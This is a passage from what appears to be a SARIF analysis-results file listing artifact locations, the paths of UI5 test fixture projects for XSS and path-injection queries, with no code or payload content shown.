"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 215 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 217 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 218 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 219 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 221 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 223 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 224 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 225 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 226 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 228 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 229 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 230 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 232 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 233 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 234 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 236 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 237 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uriBaseId" : "%SRCROOT%", + "index" : 238 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 239 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 240 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", + "uriBaseId" : "%SRCROOT%", + "index" : 241 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 245 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", + "uriBaseId" : "%SRCROOT%", + "index" : 246 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", + "uriBaseId" : "%SRCROOT%", + "index" : 247 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 248 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 249 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 250 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", + "uriBaseId" : "%SRCROOT%", + "index" : 251 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 252 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 253 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", + "uriBaseId" : "%SRCROOT%", + "index" : 254 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 255 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 256 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", + "uriBaseId" : "%SRCROOT%", + "index" : 257 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 258 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 259 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 260 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", + "uriBaseId" : "%SRCROOT%", + "index" : 261 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 262 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 263 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 264 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 265 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 268 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 269 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 270 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 272 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 273 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 274 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 277 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 278 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 279 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 281 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 282 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 283 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 286 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 287 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 288 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 290 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 291 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 292 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 293 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 294 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 295 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 296 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 297 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 298 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 299 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 300 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 301 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 302 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 303 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 304 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 305 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 306 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 307 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 308 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 309 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 310 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 312 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 313 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 314 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 316 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 317 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 318 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 320 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 321 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 322 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 324 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 325 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 326 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 328 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 329 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 330 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 332 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 333 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 334 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 335 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 336 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 337 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 338 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 339 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 340 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 341 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 342 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 344 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 345 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 346 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 347 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 349 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 350 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 351 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 353 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 354 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 356 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 357 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 358 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 359 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 362 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 364 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 365 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 366 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 368 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 369 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 370 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 372 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 373 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 374 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 376 + } + }, { + 